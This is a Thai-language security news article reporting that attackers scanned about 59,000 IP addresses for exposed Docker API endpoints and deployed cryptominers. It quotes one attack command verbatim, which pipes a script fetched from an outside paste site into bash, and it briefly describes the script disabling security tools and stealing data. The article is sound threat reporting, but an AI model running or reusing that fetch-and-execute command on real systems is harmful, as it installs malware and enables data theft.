Black Hat Asia 2023

พบแฮ็กเกอร์กำลังสแกนหา Docker ผ่านทางออนไลน์ไปแล้วถึง 59,000 ไอพี

Bad Packets ผู้เชี่ยวชาญด้านภัยคุกคามทางไซเบอร์ได้ออกมาเตือนถึงความพยามในการสแกนหา Docker เพื่อหา API Endpoint ที่ให้เข้าถึงจากออนไลน์ โดยมีการสแกนไปแล้วถึง 59,000 ไอพี

Credit: Andrey Popov/ShutterStock

เมื่อวันที่ 24 พฤศจิกายนที่ผ่านมาได้มีการค้นพบการสแกนเพื่อหาเหยื่อที่ใช้งาน Docker เพื่อค้นหา API Endpoint ที่สามารถใช้งานได้ผ่านทางออนไลน์ โดยแฮ็กเกอร์จะเข้าไปสั่งเริ่ม Alpine Linux Container ด้วยคำสั่งว่า “chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;” โดยท้ายที่สุดสคิร์ปต์ดังกล่าวจะไปเรียกติดตั้งตัวขุดเหมือง 

นอกจากนี้ผู้เชี่ยวชาญยังเผยว่าสคิร์ปต์ยังได้มีการสั่งปิดผลิตภัณฑ์ด้าน Security และสั่งปิดโปรเซส lso ซึ่งเป็นการกำจัดตัวขุดเหมือนอื่นๆ รวมถึงยังมีการลอบขโมยข้อมูลส่งกับไปหาเซิร์ฟเวอร์ด้วย ด้วยเหตุนี้เองเมื่อรู้เช่นนี้แล้วก็หมั่นตรวจสอบการใช้งานของเราเองด้วยนะครับว่ามีการเข้าถึงผ่านทางออนไลน์อย่างไร

ที่มา :  https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/


About nattakon

จบการศึกษา ปริญญาตรีและโท สาขาวิศวกรรมคอมพิวเตอร์ KMITL เคยทำงานด้าน Engineer/Presale ดูแลผลิตภัณฑ์ด้าน Network Security และ Public Cloud ในประเทศ ปัจจุบันเป็นนักเขียน Full-time ที่ TechTalkThai

Check Also

พบ ‘HinataBot’ บอทเน็ตที่อาจสร้างการโจมตี DDoS ขนาด 3.3 Tbps ได้

พบมัลแวร์บอตเน็ตใหม่ HinataBot มุ่งเป้าโจมตี Realtek SDK, Huawei Router และ Hadoop YARN Server เพื่อรวมการโจมตีที่อาจสร้าง Distributed Denial of …

[Video] NCSA Webinar Series EP.8 – WAAP ช่วยยกระดับ Security Posture ขององค์กรได้อย่างไร

สำหรับผู้ที่ไม่ได้เข้าฟังการบรรยาย NCSA Webinar Series EP.8 เรื่อง “WAAP ช่วยยกระดับ Security Posture ขององค์กรได้อย่างไร” ที่เพิ่งจัดไปเมื่อสัปดาห์ที่ผ่านมา หรือต้องการรับชมการบรรยายซ้ำอีกครั้ง สามารถเข้าชมวิดีโอบันทึกย้อนหลังได้ที่บทความนี้ครับ